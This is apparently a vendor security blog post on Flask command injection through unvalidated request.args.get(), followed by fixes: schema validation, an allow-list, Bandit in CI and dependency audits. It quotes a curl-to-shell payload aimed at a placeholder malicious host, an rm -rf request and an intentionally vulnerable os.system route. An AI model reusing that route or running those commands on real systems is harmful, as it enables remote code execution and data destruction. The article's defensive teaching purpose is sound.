
Never Trust request.get() Without Sanitizing: How Input Kills Flask Security

The Trap Is Set: How request.get() Opens the Door

In 2023, a fintech startup deployed an internal Flask-based dashboard that allowed DevOps staff to trigger infrastructure tasks remotely. One of the routes used request.args.get("cmd") to retrieve a shell command from the query string and pass it directly to a system call.

This seemed safe under the assumption that only trusted users accessed the internal dashboard. However, due to a misconfigured reverse proxy, the service was exposed publicly for several hours. During that window, automated scanners detected the endpoint.

Attackers quickly exploited it using a crafted request like ?cmd=curl+http://malicious.site/evil.sh|sh, resulting in remote code execution (RCE). From there, they accessed AWS instance metadata and credentials, leading to data exfiltration and privilege escalation.

This wasn’t a sophisticated attack; it was enabled entirely by unvalidated input from request.get(). The application lacked authentication, and there was no input sanitization. Worse, no static analysis tools flagged the risk because the team assumed the app was safe due to its internal-only context.

This article is not about how to exploit such flaws. Its purpose is to help developers recognize this insecure pattern, understand the risks, and adopt secure coding practices to prevent similar incidents.

Exploit in Action: A Flask App Broken by Input

In this section, we showcase a minimal Flask app that demonstrates just how quickly things can go wrong when request.get() is used without validation. The simplicity of this example underscores the danger: even a few lines of insecure code can expose your system to severe threats.
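
A minimal sketch of such a route is shown below; it is reconstructed for illustration, with the /run path and cmd parameter matching the example used throughout this article:

python
from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/run')
def run():
    # DANGEROUS: raw query-string input is passed straight to the shell
    cmd = request.args.get('cmd')
    os.system(cmd)
    return 'done'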

This endpoint takes a cmd parameter from the request and passes it directly to os.system(), allowing anyone who can access the endpoint to execute arbitrary system commands. No input checks, no input sanitization, no guardrails. This is a textbook example of how not to handle user input.


With no validation in place, attackers can exploit this by passing dangerous shell commands directly in the query string. For example, a simple request like curl 'http://localhost:5000/run?cmd=rm+-rf+/some/dir' could wipe critical directories. The command is executed as-is, with no filtering, giving the attacker remote code execution (RCE) capabilities.

The real danger lies in how silently this vulnerability passes through development pipelines. Since no static analysis tools were configured to detect unsafe patterns like unsanitized request.get(), and because the endpoint was believed to be used only internally, no one flagged the issue during code review. This common DevOps blind spot, trusting internal environments and skipping validation for the sake of speed, allowed a critical vulnerability to reach production undetected.

Where It All Breaks: Common Dev Pitfalls

Many serious vulnerabilities in Flask applications originate not from complex logic, but from simple, repeated mistakes. When development speed is prioritized over security, certain risky patterns become normalized, often without developers realizing their long-term consequences.

Here are the most common mistakes:

  • Using request.get() without validation or default values
    Developers often use request.args.get() to quickly extract parameters from a request. Without defaults or validation, this leads to unpredictable behavior, such as passing None into logic or allowing raw user input into dangerous operations.
  • Trusting external input without checks
    Whether the input comes from a public form, an API gateway, or an internal dashboard, it must be treated as untrusted. Assuming it’s safe simply because it’s behind a VPN or used by internal teams is a critical misjudgment.
  • Delegating security to third-party libraries without verifying behavior
    While libraries can abstract functionality, they shouldn’t be blindly trusted to enforce security. Always understand how they handle input, and wrap external code in your validation layers when necessary.
  • No type definitions or input validation in route handlers
    Flask allows dynamic typing and flexible request handling, but this can quickly lead to bugs or injection flaws. Without explicit type enforcement and schema validation, unexpected input can bypass logic or break downstream services.

These mistakes are often driven by the pressure to move fast: to get a feature live or a fix deployed. But each shortcut chips away at the security of your application. Secure coding must be the standard, not an exception.

Why request.get() Is Risky by Default

At a glance, request.get() (including its variants request.args.get() and request.form.get()) seems harmless and convenient. But beneath that simplicity lies a dangerous assumption: that incoming data is trustworthy.

This assumption is flawed. Whether you’re building a public API or an internal tool, client input must always be treated as untrusted. Yet in many development teams, especially when working with microservices or internal dashboards, there’s a tendency to skip validation “because it’s internal.” This mindset opens the door to critical vulnerabilities.

Why This Is Risky

  • No type enforcement: request.get() returns whatever the client sent, as a raw string or None. It doesn’t validate type, format, or the presence of required fields.
  • Silent failures: If a key is missing, it returns None, often leading to unintended behavior or logic errors downstream.
  • No filtering: It does not strip or sanitize harmful input, leaving your app vulnerable to injection attacks.
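
A minimal sketch of these behaviors, using a hypothetical /item route with id and page parameters:

python
from flask import Flask, request

app = Flask(__name__)

@app.route('/item')
def item():
    item_id = request.args.get('id')       # None if 'id' is missing: a silent failure
    page = request.args.get('page', '1')   # always a raw string: no type enforcement
    # int(page) below raises ValueError on input like ?page=abc, and neither
    # value has been filtered or sanitized before use
    return f'item={item_id}, page={int(page)}'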

The Illusion of Internal Safety

In microservice-heavy environments or tools behind VPNs, developers often rely on infrastructure boundaries as their primary defense. This leads to a false sense of security. Misconfigurations, leaked credentials, or an exposed service can quickly turn “internal only” into “publicly exploitable.” request.get() is not the problem; blindly trusting it is. Without input validation, you’re giving attackers a direct line to your application’s logic, and potentially, to your infrastructure.

Secure the Flow: Validating User Input Correctly

The cornerstone of Flask security is simple: never process input without structured validation. Every piece of data your application receives, whether from query parameters, forms, or APIs, must be treated as untrusted and rigorously validated before use.

Python’s ecosystem offers several mature libraries tailored to validating request data:

  • Marshmallow – Great for defining schemas and deserializing data.
  • Pydantic – Known for type-safe models; widely used in FastAPI, but works well in Flask too.
  • WTForms – Ideal for form handling and validation in traditional web apps.

These tools make it easy to define and enforce the structure, types, and constraints of user input.

What to Validate

  • Types: Ensure that integers are integers, strings are strings, and booleans are booleans.
  • Ranges and lengths: Set boundaries for numbers, and enforce minimum and maximum lengths for strings.
  • Required fields: Explicitly require the presence of certain parameters.
  • Patterns: Use regular expressions to validate expected formats like emails, tokens, or filenames.

Example with Marshmallow:

python
from flask import Flask, request
from marshmallow import Schema, fields, ValidationError
import os

app = Flask(__name__)

class CommandSchema(Schema):
    cmd = fields.String(required=True)

schema = CommandSchema()

# whitelist-based sanitation: only explicitly approved commands are ever executed
ALLOWED_COMMANDS = {'uptime', 'df -h'}

def sanitize_cmd(cmd):
    if cmd not in ALLOWED_COMMANDS:
        raise ValidationError('command not allowed')
    return cmd

@app.route('/run')
def run():
    try:
        args = schema.load(request.args)
        safe_cmd = sanitize_cmd(args['cmd'])
        os.system(safe_cmd)
        return 'ok', 200
    except ValidationError as e:
        return str(e), 400
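
For teams that prefer type-annotated models, a roughly equivalent sketch with Pydantic also covers the length and pattern checks discussed earlier. This assumes Pydantic v2 and reuses the app object and request import from the example above; the /run-pydantic route is hypothetical:

python
from pydantic import BaseModel, Field
from pydantic import ValidationError as PydanticValidationError

class CommandParams(BaseModel):
    # required string, length-bounded and restricted to a safe character set
    cmd: str = Field(min_length=1, max_length=64, pattern=r'^[A-Za-z0-9_.\-]+$')

@app.route('/run-pydantic')
def run_pydantic():
    try:
        params = CommandParams(**request.args)
    except PydanticValidationError as e:
        return str(e), 400
    return {'cmd': params.cmd}, 200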

Reusable Decorators for Clean Code

You can create decorators to apply validation consistently across multiple routes:

python
from functools import wraps
from flask import request
from marshmallow import ValidationError

def validate_with(schema):
    def decorator(f):
        @wraps(f)  # preserve the view function's name so Flask endpoints don't collide
        def wrapped(*args, **kwargs):
            try:
                validated = schema.load(request.args)
                return f(validated, *args, **kwargs)
            except ValidationError as e:
                return str(e), 400
        return wrapped
    return decorator
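
Applied to a route, the decorator keeps the handler free of parsing logic. A brief sketch, reusing the CommandSchema and app defined above with a hypothetical /check route:

python
@app.route('/check')
@validate_with(CommandSchema())
def check(validated):
    # validated contains only schema-approved data; raw request.args is never used here
    return {'cmd': validated['cmd']}, 200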

Bottom Line

Structured validation is not optional; it’s essential. Never trust raw input, even in internal systems. Always use schemas, always check types and formats, and always sanitize what you process.

DevSecOps Fixes: Pipeline Security, Shift Left

Security shouldn’t start in production; it should start the moment code is written. This is the core principle behind the “Shift Left” movement: catching security issues early in the development lifecycle before they ever reach runtime.

Enforce Security From the First Commit

To effectively catch risky use of request.get() and similar patterns, integrate security directly into your CI/CD pipeline. Here’s how:

  • Add SAST rules (Static Application Security Testing) to your workflow. These rules can detect dangerous code like unsanitized request.get() calls passed to system functions.
  • Automate checks using tools like Bandit, Semgrep, or custom scripts. Run them as part of GitHub Actions, GitLab CI, or Bitbucket Pipelines.
  • Define custom policies to flag insecure practices such as using request.args.get() without validation.

Block Merges That Introduce Risk

Code that fails validation checks shouldn’t be allowed to merge. Preventing vulnerable commits from being merged enforces security discipline across teams and helps create a culture of accountability. For example, a minimal GitHub Actions job that runs Bandit on every push and pull request:

yaml
on: [push, pull_request]

jobs:
  secure-check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install Bandit
        run: pip install bandit
      - name: Run Bandit
        run: bandit -r app/ -ll

By embedding automated security analysis in your pipeline, you catch issues as they’re introduced, not after they’ve gone live. This reduces risk, saves time, and helps teams deploy Flask apps with confidence.

Don’t Trust the Package: Third-Party Risk

While third-party libraries can boost productivity, they can also silently introduce security vulnerabilities, especially when it comes to input handling.

Real Risks from Insecure Packages

There have been cases where trusted libraries performed unsafe operations under the hood, such as reading user input using request.get() and passing it directly into functions like eval(), open(), or system commands. These flaws are often hidden behind layers of abstraction, making them harder to detect during code review.

For example, a utility meant to streamline file uploads used unsanitized query parameters to construct file paths, a pattern that invites path traversal and unauthorized file access.
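
A sketch of the safer pattern for that scenario, assuming a hypothetical /download route that serves files from a fixed base directory: resolve the requested path and reject anything that escapes the base.

python
import os
from flask import Flask, request, abort, send_file

app = Flask(__name__)
BASE_DIR = '/srv/uploads'  # hypothetical storage directory

@app.route('/download')
def download():
    name = request.args.get('name', '')
    # resolve symlinks and '..' segments, then confirm the result stays inside BASE_DIR
    full_path = os.path.realpath(os.path.join(BASE_DIR, name))
    if not full_path.startswith(BASE_DIR + os.sep):
        abort(400)
    return send_file(full_path)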

Transitive Dependencies: The Hidden Threat

Even if your direct dependencies are safe, transitive dependencies might not be. These are packages that your libraries depend on, and they can bring along risky behavior without your knowledge. A minor update to a dependency deep in your stack could introduce an unsanitized request.get() usage in places you don’t control. This risk multiplies in microservices and internal tools that rely heavily on smaller, niche libraries.

What to Do?

  • Audit dependencies regularly, including transitive ones.
  • Use tools like pip-audit, Safety, or GitHub Dependabot to scan for known vulnerabilities.
  • Manually review how external packages handle user input, especially if they interact with routes or request parameters.

Never assume a package, no matter how small or well-known, enforces your security standards. Always validate externally sourced input before it enters your application logic.

Developer Hygiene: DevSecOps Education and Culture

Building secure applications isn’t just about tools; it’s about culture. Teams must internalize security as part of their development identity. This means making secure coding, especially input validation, a non-negotiable part of every workflow.

Make Input Validation Part of Code Reviews

Every code review should ask:

  • Is user input being validated?
  • Are schemas or type checks in place?
  • Is raw input passed into logic or commands?

Encouraging these checks during peer reviews fosters a mindset where security is everyone’s job, not just the security team’s.

Define Secure Coding Policies for Flask APIs

Establish internal guidelines that spell out:

  • How to handle request input (never trust request.get() without validation)
  • When and how to use libraries like Marshmallow or Pydantic
  • Requirements for using decorators and schema validation in routes

Make these policies part of your onboarding and documentation.

Tools to Detect Unsafe Patterns

Use automation to catch risky patterns early and consistently:

  • Linters: Tools like flake8, pylint, or ruff can be extended with plugins to detect misuse of request.get().
  • Pre-commit hooks: Automatically scan for dangerous patterns before code is even committed.
  • Static analyzers: Tools like Bandit, Xygeni, or Semgrep can flag insecure input handling, missing validation, or unsafe data flows.

Build the Culture

Security isn’t just technical; it’s behavioral. When validation is second nature, when reviews prioritize safety, and when tooling enforces standards automatically, your team becomes resilient by design.

Xygeni: How It Prevents These Issues

Xygeni helps close the door that unvalidated input opens, starting from the moment code is written. It’s a security automation platform that detects dangerous patterns, such as unsanitized request.get() usage, as early as the first commit.

Early Detection by Design

Xygeni scans every commit and pull request to identify insecure use of request.get() and similar anti-patterns. It flags instances where input is not validated before being passed to critical functions like os.system, eval, or file operations.

This proactive approach ensures that risky code never silently reaches production.

Block Insecure Merges Automatically

Beyond detection, Xygeni allows teams to enforce policies that prevent insecure code from being merged. These policies are customizable, letting organizations define what’s acceptable and what’s not based on their internal Flask security standards.

pattern: "request\.args\.get\(['\"]\w+['\"]\)"
condition: "used in os\.system or open() or exec()"
action: "block"

Seamless CI/CD Integration

Xygeni integrates with the CI/CD platforms most teams already use, such as GitHub Actions, GitLab CI, and Bitbucket Pipelines. Whether you’re running cloud-based CI or self-hosted pipelines, it fits into your workflow without disruption, enforcing Flask security policies consistently across every repo.

By embedding security checks directly into your development pipeline, Xygeni ensures that unsafe patterns are caught early, reviewed quickly, and fixed before they cause harm.

Final Punch: Clean Input or Be Compromised

It’s important to emphasize: this is not just a Flask security problem. The core issue is trusting user input, regardless of the framework or environment.

Unvalidated input is a universal threat vector; it leads to remote code execution, data breaches, privilege escalation, and ultimately loss of control over your systems. That’s why validation must be treated as a first-class concern in all development processes. Validate everything. Assume nothing. Sanitize always.

Validation is not optional. It’s not a “nice to have.” It’s a non-negotiable part of secure software development. Failing to validate input is like leaving your front door open in a dangerous neighborhood; someone will eventually walk in.

Whether you’re building APIs for public consumption or internal services behind VPNs, input must be validated and sanitized. Every parameter, every form field, every query string: always.

The best practices outlined in this article (schema-based validation, static code analysis, secure pipelines, and cultural hygiene) are essential to defending against the abuse of request.get() and similar unsafe patterns.
